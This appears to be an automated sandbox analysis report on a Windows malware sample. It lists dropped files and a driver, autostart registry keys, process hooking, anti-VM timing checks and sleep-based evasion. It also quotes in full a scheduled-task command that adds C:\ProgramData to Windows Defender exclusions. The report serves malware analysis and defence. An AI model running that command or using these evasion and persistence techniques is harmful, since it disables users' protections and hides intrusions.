Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: NEiV2V.exe, 00000027.00000000.2641903584.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000028.00000000.2663600373.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 00000029.00000000.2667844031.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 0000002C.00000002.2689310539.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 0000002C.00000000.2680946419.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 0000002D.00000002.2689022254.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 0000002D.00000000.2681647191.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 0000002E.00000002.2884835002.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 0000002E.00000000.2874343841.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 0000002F.00000000.2877870986.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 0000002F.00000002.2886408402.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 00000030.00000000.3464124500.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000030.00000002.3482708412.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 00000031.00000000.3472661139.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 00000031.00000002.3486320924.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 00000032.00000002.4083518543.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000032.00000000.4064147355.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 00000033.00000000.4070121540.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 00000033.00000002.4084684259.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe.39.dr, NEiV2V.exe.5.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe, 00000004.00000000.2140059871.0000000140014000.00000002.00000001.01000000.00000007.sdmp, 0b1G0H.exe, 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmp, 0b1G0H.exe, 00000005.00000000.2156908507.0000000140014000.00000002.00000001.01000000.00000007.sdmp, 0b1G0H.exe.0.dr
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
Source: tbcore3U.dll.5.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.5.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.5.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.39.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.39.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.39.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 40_2_00982691 push ecx; ret 40_2_009826A4
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCode function: 41_2_00B52691 push ecx; ret 41_2_00B526A4

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Users\user\Documents\0b1G0H.exeJump to dropped file
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeFile created: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeJump to dropped file
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Documents\0b1G0H.exeFile created: C:\Program Files (x86)\NEiV2V\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Documents\0b1G0H.exeFile created: C:\Program Files (x86)\NEiV2V\NEiV2V.exeJump to dropped file
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Users\user\Documents\0b1G0H.exeJump to dropped file
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeFile created: C:\Program Files (x86)\2I9luTPI\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\0b1G0H.exeMemory written: PID: 7732 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeMemory written: PID: 7732 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeMemory written: PID: 7752 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeMemory written: PID: 7752 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 3300 base: 9D0005 value: E9 8B 2F 53 76 Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 3300 base: 76F02F90 value: E9 7A D0 AC 89 Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 3300 base: FA0005 value: E9 8B 2F F6 75 Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 3300 base: 76F02F90 value: E9 7A D0 09 8A Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 1144 base: A90005 value: E9 8B 2F 47 76
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 1144 base: 76F02F90 value: E9 7A D0 B8 89
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 7612 base: C40005 value: E9 8B 2F 2C 76
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 7612 base: 76F02F90 value: E9 7A D0 D3 89
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 5900 base: F20005 value: E9 8B 2F FE 75
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 5900 base: 76F02F90 value: E9 7A D0 01 8A
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 6452 base: 1470005 value: E9 8B 2F A9 75
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 6452 base: 76F02F90 value: E9 7A D0 56 8A
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 6272 base: 1020005 value: E9 8B 2F EE 75
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 6272 base: 76F02F90 value: E9 7A D0 11 8A
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 6676 base: FD0005 value: E9 8B 2F F3 75
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 6676 base: 76F02F90 value: E9 7A D0 0C 8A
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 7704 base: 1430005 value: E9 8B 2F AD 75
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 7704 base: 76F02F90 value: E9 7A D0 52 8A
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 3484 base: B20005 value: E9 8B 2F 3E 76
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 3484 base: 76F02F90 value: E9 7A D0 C1 89
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 8024 base: 1170005 value: E9 8B 2F D9 75
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMemory written: PID: 8024 base: 76F02F90 value: E9 7A D0 26 8A
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 8012 base: 1120005 value: E9 8B 2F DE 75
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeMemory written: PID: 8012 base: 76F02F90 value: E9 7A D0 21 8A
Source: C:\Users\user\Desktop\138745635-72645747.116.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C6282C1
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C5EA702
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C5FB056
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C616E74
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C542089
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C5387B1
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C45DE34
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 3611F74
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 3A191F3
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 369E627
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 36C4F7E
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 3A2B700
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 39E0981
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 36010CD
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 3761246
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C52F34F
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BEB1EB4
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BDAA03F
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BF17C0E
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BEAA702
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C58C0AF
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C57F839
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C50FFCB
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C647912
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BD1DE34
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BDA8B19
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BDCFFCB
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C5387AA
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C657C0E
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BDA90FC
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BEC9F9E
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C4E8B19
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BE02089
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BE3F839
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BF07912
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C658092
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C5FCBDE
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C503E38
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BDF87AA
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BE4183C
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C632F48
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BE4C0AF
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BF091B6
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BEF6565
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C58183C
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C5F1EB4
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BEBCBDE
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BF18092
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C636565
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C4DF12B
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C4ABC04
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C609F9E
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BDC5143
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeAPI/Special instruction interceptor: Address: 6C6491B6
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BE0080B
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeAPI/Special instruction interceptor: Address: 6BE95F8C
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeSection loaded: OutputDebugStringW count: 1924
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\138745635-72645747.116.exeRDTSC instruction interceptor: First address: 140001109 second address: 140001120 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\138745635-72645747.116.exeRDTSC instruction interceptor: First address: 140001120 second address: 140001120 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FE11929BD20h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\0b1G0H.exeRDTSC instruction interceptor: First address: 611E15 second address: 611E23 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\0b1G0H.exeWindow / User API: threadDelayed 7275Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeWindow / User API: threadDelayed 2647Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeWindow / User API: threadDelayed 448Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeWindow / User API: threadDelayed 355Jump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\0b1G0H.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-14013
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_40-3244
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_41-3272
Source: C:\Users\user\Documents\0b1G0H.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\138745635-72645747.116.exe TID: 7380Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 7824Thread sleep count: 7275 > 30Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 7824Thread sleep time: -14550000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 3696Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 3696Thread sleep time: -360000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 3696Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 7824Thread sleep count: 2647 > 30Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exe TID: 7824Thread sleep time: -5294000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 2484Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 7580Thread sleep count: 56 > 30Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 7580Thread sleep time: -1680000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 7632Thread sleep count: 448 > 30Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 7632Thread sleep time: -448000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 3796Thread sleep count: 355 > 30Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exe TID: 3796Thread sleep time: -1065000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeLast function: Thread delayed
Source: C:\Users\user\Documents\0b1G0H.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A52A1B8 FindFirstFileExW,4_2_00007FFE1A52A1B8
Source: C:\Users\user\Documents\0b1G0H.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: 138745635-72645747.116.exe, 00000000.00000003.1904098242.00000000005B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\0b1G0H.exeAPI call chain: ExitProcess graph end nodegraph_4-14014
Source: C:\Users\user\Documents\0b1G0H.exeAPI call chain: ExitProcess graph end nodegraph_4-14358
Source: C:\Users\user\Desktop\138745635-72645747.116.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400073E0 LdrLoadDll,4_2_00000001400073E0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B00CD mov eax, dword ptr fs:[00000030h]39_3_028B00CD
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B00CD mov eax, dword ptr fs:[00000030h]39_3_028B00CD
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B0643 mov eax, dword ptr fs:[00000030h]39_3_028B0643
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B0643 mov eax, dword ptr fs:[00000030h]39_3_028B0643
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B00CD mov eax, dword ptr fs:[00000030h]39_3_028B00CD
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B00CD mov eax, dword ptr fs:[00000030h]39_3_028B00CD
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B0643 mov eax, dword ptr fs:[00000030h]39_3_028B0643
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 39_3_028B0643 mov eax, dword ptr fs:[00000030h]39_3_028B0643
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,4_2_0000000140004630
Source: C:\Users\user\Documents\0b1G0H.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000001400106B0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,4_2_00000001400092E0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A5276E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFE1A5276E0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A521F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFE1A521F50
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A522630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFE1A522630
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 40_2_009810CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_009810CC
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 40_2_00982AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00982AE2
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 40_2_009851FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_009851FB
